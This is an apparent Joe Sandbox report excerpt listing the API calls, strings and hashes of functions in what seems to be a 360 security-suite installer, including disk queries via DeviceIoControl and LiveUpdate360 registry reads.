                                                                                                                                                                      • DeviceIoControl.KERNEL32(?,0004D02C,?,0000022C,?,0000022C,?,00000000), ref: 001D1B82
                                                                                                                                                                      • _memset.LIBCMT ref: 001D1B93
                                                                                                                                                                      • _memcpy_s.LIBCMT ref: 001D1BA5
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,0017BD49,?), ref: 001D1BCA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$CloseControlCreateDeviceFileHandle_memcpy_s
                                                                                                                                                                      • String ID: \\.\PHYSICALDRIVE%d
                                                                                                                                                                      • API String ID: 2371279349-613073274
                                                                                                                                                                      • Opcode ID: 3316a31004345573f7c1b6115653f0bae3f7d47106d7d11dd7fb3cf7f4fb1740
                                                                                                                                                                      • Instruction ID: 02b74669028a8ae0896dd407e421c43bd359b950d2ee475b38b1e965d777e9f2
                                                                                                                                                                      • Opcode Fuzzy Hash: 3316a31004345573f7c1b6115653f0bae3f7d47106d7d11dd7fb3cf7f4fb1740
                                                                                                                                                                      • Instruction Fuzzy Hash: D3411A71901298AFDB31DFA8DC49FDE7BACAF19710F10051AE918EB281E7715604CF60
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001D1918
                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?), ref: 001D194F
                                                                                                                                                                      • _memset.LIBCMT ref: 001D196D
                                                                                                                                                                      • DeviceIoControl.KERNEL32(?,0007C088,?,00000021,?,00000210,?,00000000), ref: 001D19E2
                                                                                                                                                                      • _memset.LIBCMT ref: 001D19F5
                                                                                                                                                                      • _memcpy_s.LIBCMT ref: 001D1A07
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,0017BD49,?,?,?,?,?,?,?), ref: 001D1A2F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$CloseControlCreateDeviceFileHandle_memcpy_s
                                                                                                                                                                      • String ID: \\.\PHYSICALDRIVE%d
                                                                                                                                                                      • API String ID: 2371279349-613073274
                                                                                                                                                                      • Opcode ID: 732fcf4bc03cbde725f8b46cfe744f3470253a176d7f92463a98d77e9435432e
                                                                                                                                                                      • Instruction ID: 39f61e3dfdcb64d110904139b92b7d2559d42e0e59b4fca5cbfa2a7b3a4a68af
                                                                                                                                                                      • Opcode Fuzzy Hash: 732fcf4bc03cbde725f8b46cfe744f3470253a176d7f92463a98d77e9435432e
                                                                                                                                                                      • Instruction Fuzzy Hash: 7F41187190068CAFDF31DFA8DC85BDE7BACAB19304F10452AFA58AB282D77557048F60
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00172750: _vswprintf_s.LIBCMT ref: 00172783
                                                                                                                                                                      • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001E2292
                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 001E22D8
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001E22E3
                                                                                                                                                                      • _memset.LIBCMT ref: 001E2358
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001E23D3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle$ControlCreateDeviceFile_memset_vswprintf_s
                                                                                                                                                                      • String ID: GenuineIntel:0f8bfbff$\\.\PhysicalDrive%d
                                                                                                                                                                      • API String ID: 759969516-2564646230
                                                                                                                                                                      • Opcode ID: 24747aee90c59020d87bfdc3b201692b1ddc65e5fd27a073d420fdbae1188453
                                                                                                                                                                      • Instruction ID: 0da779d78ee0b1b8d8c3f46743280c176f33aa4fa679bf37c65aca8344bb69ad
                                                                                                                                                                      • Opcode Fuzzy Hash: 24747aee90c59020d87bfdc3b201692b1ddc65e5fd27a073d420fdbae1188453
                                                                                                                                                                      • Instruction Fuzzy Hash: 4D519AB0608B80AFD360CF258C91BAFB7E8FB99704F40492DF68DD6281E77495058F56
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001D2177
                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000038), ref: 001D21BD
                                                                                                                                                                      • _memset.LIBCMT ref: 001D21DF
                                                                                                                                                                      • DeviceIoControl.KERNEL32(0017BD49,0004D030,?,00000028,?,00000028,?,00000000), ref: 001D2236
                                                                                                                                                                      • _memset.LIBCMT ref: 001D226C
                                                                                                                                                                      • CloseHandle.KERNEL32(0017BD49,?,?,?,?,?,00000038), ref: 001D22A9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$CloseControlCreateDeviceFileH_prolog3Handle
                                                                                                                                                                      • String ID: \\.\PHYSICALDRIVE%d
                                                                                                                                                                      • API String ID: 1408917728-613073274
                                                                                                                                                                      • Opcode ID: 34cb7de76dabffba6fd333ae0ac937f30670b2795fbff652553c5a9ecc5a71de
                                                                                                                                                                      • Instruction ID: d2ee5645051a41cabb3333284719e9adec57b9ac994156aedfda5ce1956d8e06
                                                                                                                                                                      • Opcode Fuzzy Hash: 34cb7de76dabffba6fd333ae0ac937f30670b2795fbff652553c5a9ecc5a71de
                                                                                                                                                                      • Instruction Fuzzy Hash: 30417EB5A0024CAFDB21EFA4EC85AEF77B8EF54704F00412AF925E7291EB345A458B50
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001D1C3E
                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,?,?,00000000,?), ref: 001D1C6F
                                                                                                                                                                      • _memset.LIBCMT ref: 001D1C90
                                                                                                                                                                      • DeviceIoControl.KERNEL32(?,0004D008,?,0000003C,?,0000022D,?,00000000), ref: 001D1CF8
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,0017BD49,?,?,?,?,?,00000000,?), ref: 001D1D29
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$CloseControlCreateDeviceFileHandle
                                                                                                                                                                      • String ID: SCSIDISK$\\.\PHYSICALDRIVE%d
                                                                                                                                                                      • API String ID: 2939382409-3226356902
                                                                                                                                                                      • Opcode ID: 81b0bf874545d30f12fbed5676d7cd56817fd14b4f5f3bf2a449edffa5930116
                                                                                                                                                                      • Instruction ID: 7a0ef436587e1cb03bb568598fa08da517820089f2c2a0962e4e612d92088bd4
                                                                                                                                                                      • Opcode Fuzzy Hash: 81b0bf874545d30f12fbed5676d7cd56817fd14b4f5f3bf2a449edffa5930116
                                                                                                                                                                      • Instruction Fuzzy Hash: 4A31FAB194028CAFEF31DFA4DC89EDE7BADAF19704F14412AB918AB292D7715604CB11
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 001BCF8A: FindClose.KERNEL32(?,?,001BD728,00000190,?,?,001C956F,?,?,?,?,?,?,?,0000000C), ref: 001BCFA4
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 001BD74A
                                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,00000000,0000018E,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 001BD767
                                                                                                                                                                      • SetLastError.KERNEL32(0000007B,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 001BD77A
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000190,?,?,001C956F,?,?,?,?,?,?,?,0000000C), ref: 001BD785
                                                                                                                                                                      • _wcsrchr.LIBCMT ref: 001BD796
                                                                                                                                                                      • _wcsrchr.LIBCMT ref: 001BD7A0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find_wcsrchr$CloseErrorFileFirstFullLastNamePathlstrlen
                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                      • API String ID: 3086268848-438819550
                                                                                                                                                                      • Opcode ID: 71d9cd7864e9f843ac9161c5d842b5d5e1403b52aa0761cc6df2c5ed61cb580b
                                                                                                                                                                      • Instruction ID: 031c39bb99edbae8f596ac9b26ae9c8c4324ab0424720951d2a58cb5c42a4b02
                                                                                                                                                                      • Opcode Fuzzy Hash: 71d9cd7864e9f843ac9161c5d842b5d5e1403b52aa0761cc6df2c5ed61cb580b
                                                                                                                                                                      • Instruction Fuzzy Hash: 7F11EFB27007046BE7286A717C89BFB329CEF69749F110939FA16D2141FFA0980087A1
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00172750: _vswprintf_s.LIBCMT ref: 00172783
                                                                                                                                                                      • CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000,?,001E335B,?,00000064), ref: 001E2645
                                                                                                                                                                      • _memset.LIBCMT ref: 001E267A
                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00002710,?,00000000), ref: 001E26A2
                                                                                                                                                                      • _memset.LIBCMT ref: 001E26BA
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001E2708
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$CloseControlCreateDeviceFileHandle_vswprintf_s
                                                                                                                                                                      • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                      • API String ID: 3752575622-2935326385
                                                                                                                                                                      • Opcode ID: c4762f1c1d0367d2238b2ff3aa1134dc1541818ffc9b3894aabf38253de5ef21
                                                                                                                                                                      • Instruction ID: 5c1484e3eaf4b1d5857a3c5f76b06c8f2459ce69e571fe14deb1b211171519e9
                                                                                                                                                                      • Opcode Fuzzy Hash: c4762f1c1d0367d2238b2ff3aa1134dc1541818ffc9b3894aabf38253de5ef21
                                                                                                                                                                      • Instruction Fuzzy Hash: 32418F71504780AFE324DF69DC8AEAFB7E8FFE9700F400A1DF59882181EB7495448B62
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0016E084
                                                                                                                                                                      • CreateFileW.KERNEL32 ref: 0016E0AA
                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,(5#,00000000,00000004,00000000,00000004,00000000,00000000), ref: 0016E0DA
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0016E0E3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseControlCreateCurrentDeviceFileHandleProcess
                                                                                                                                                                      • String ID: (5#$\\.\360SelfProtection
                                                                                                                                                                      • API String ID: 3778458602-3399028602
                                                                                                                                                                      • Opcode ID: 4fafd6501c16d9c186cd1b05dfcc801f9f7c78190ae4eabdd51b57429a54c769
                                                                                                                                                                      • Instruction ID: 02c7860ec26e45b0ca72c04bca6cb36d25e7da87e00d674f217389d18593a94d
                                                                                                                                                                      • Opcode Fuzzy Hash: 4fafd6501c16d9c186cd1b05dfcc801f9f7c78190ae4eabdd51b57429a54c769
                                                                                                                                                                      • Instruction Fuzzy Hash: 9BF0A4327443107BE6109B64FC0AFAE77A4AB84F11F454658FB94A71D0D7B45608C797
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001D0152
                                                                                                                                                                      • FindResourceW.KERNEL32(00000000,?,?,DLL), ref: 001D0163
                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000,00000000), ref: 001D0174
                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 001D0180
                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 001D018B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3046278646-0
                                                                                                                                                                      • Opcode ID: 8cc8433009b9c8226904e9b82dfc7c5a704f4943d6d6062689d9d59c3dc9dee1
                                                                                                                                                                      • Instruction ID: ce7b4e120c3ffc64b892a5b8b2467edd15332dfecdcc986c03344d74fe00b8dd
                                                                                                                                                                      • Opcode Fuzzy Hash: 8cc8433009b9c8226904e9b82dfc7c5a704f4943d6d6062689d9d59c3dc9dee1
                                                                                                                                                                      • Instruction Fuzzy Hash: A0F06D72500305BFCF115F65FC08AAA7F68EF547A1F018025FD18D6220DB31C860DBA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(0024C628,0024C628,0024CDBC,00000000,0024C68C,02E24560), ref: 001CDA53
                                                                                                                                                                        • Part of subcall function 0017D354: _wcsnlen.LIBCMT ref: 0017D36B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: PrivateProfileString_wcsnlen
                                                                                                                                                                      • String ID: 360Installer
                                                                                                                                                                      • API String ID: 4066129061-2026047672
                                                                                                                                                                      • Opcode ID: 05b6464acd169ccd31c54fc829d13c9233a963d02bd259246a4d3f20341c4653
                                                                                                                                                                      • Instruction ID: 1134f33b548b4991ded852ee12e6066d1775cae6e19fee34d398b06b0db75d46
                                                                                                                                                                      • Opcode Fuzzy Hash: 05b6464acd169ccd31c54fc829d13c9233a963d02bd259246a4d3f20341c4653
                                                                                                                                                                      • Instruction Fuzzy Hash: B2E03073104210ABD6109BA4DC44D9BB7F9EF98760F144A59F55993261C7316C20CBA1
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: listen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3257165821-0
                                                                                                                                                                      • Opcode ID: 5af958e5c2cc35e3eb7916246b9b5bf46361eef3c7ec6eb2e9b72ea0fc482ec8
                                                                                                                                                                      • Instruction ID: 7681465be3e253cd5fefa8516ef8f45db6f3c5a44134b47a0434fdf8e47dc99d
                                                                                                                                                                      • Opcode Fuzzy Hash: 5af958e5c2cc35e3eb7916246b9b5bf46361eef3c7ec6eb2e9b72ea0fc482ec8
                                                                                                                                                                      • Instruction Fuzzy Hash: 61D09272254100DBD7019B24C648E2177B5BB5972AF2086ACB14D8A1A2C7329866DB00


                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 5F516DCB: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\LiveUpdate360,00000000,000F003F,5F5BC288,00000000,5F57AC78,74DF30D0,?,5F5BC3F0,5F5BC288), ref: 5F516DF2
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(00000000,LogLevel,00000000,?,?,?,?,5F57AC78), ref: 5F516FE4
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(?,DnsProxy,00000000,?,?,?,?,5F57AC78), ref: 5F517010
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(?,TFWRate,00000000,?,?,?,?,5F57AC78), ref: 5F51703C
                                                                                                                                                                      • RegQueryValueExW.KERNEL32(?,Intranet,00000000,?,?,?,?,5F57AC78), ref: 5F517068
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,ProxyUpdateDate,00000000,?,?,?,?,5F57AC78), ref: 5F51709C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: QueryValue$Open
                                                                                                                                                                      • String ID: ,%s,$,360sdupd,360tray,360leakfixer,360safe,softmanager,360netcfg,seup,360entclient,softmgr,sdis,$360sdUpd,360tray,360leakfixer,360safe,SoftManager,360netcfg,seup,360EntClient,SoftMgr,Sdis$DnsProxy$Intranet$LogLevel$MaxDnSpeed$MaxUpSpeed$MaxUpUpdate$Nat$NatUpdate$NatWLan$PeerNumPerS$ProxyUpdateDate$TFWRate$UseEntModuleList
                                                                                                                                                                      • API String ID: 1606891134-779865806
                                                                                                                                                                      • Opcode ID: f9b178bb0aeb89b0f17dde6fc213a1bfc02205bf9b68a6b31387ba72f2b03a55
                                                                                                                                                                      • Instruction ID: 592e3a6cf20613ed57cfc4567814a239acdba31316c6187fb1eb9a63aa62e4e2
                                                                                                                                                                      • Opcode Fuzzy Hash: f9b178bb0aeb89b0f17dde6fc213a1bfc02205bf9b68a6b31387ba72f2b03a55
                                                                                                                                                                      • Instruction Fuzzy Hash: 44B172B2D0161CABEB11DFA5CD80DEEBBBCFB09654B20422FE519E7202E73166458F50

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001CD0FC
                                                                                                                                                                      • SHCreateDirectoryExW.SHELL32(00000000,?,00000000,\360P2SP.dll,00000000,DLL,00000014,0017BCDE), ref: 001CD1E0
                                                                                                                                                                      • MoveFileExW.KERNEL32(?,00000000,00000004,?), ref: 001CD1FD
                                                                                                                                                                      • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 001CD218
                                                                                                                                                                      • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 001CD23E
                                                                                                                                                                      • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 001CD252
                                                                                                                                                                        • Part of subcall function 0017AFB8: __EH_prolog3.LIBCMT ref: 0017AFBF
                                                                                                                                                                        • Part of subcall function 001CCF0E: GetProcAddress.KERNEL32(?,?), ref: 001CCF16
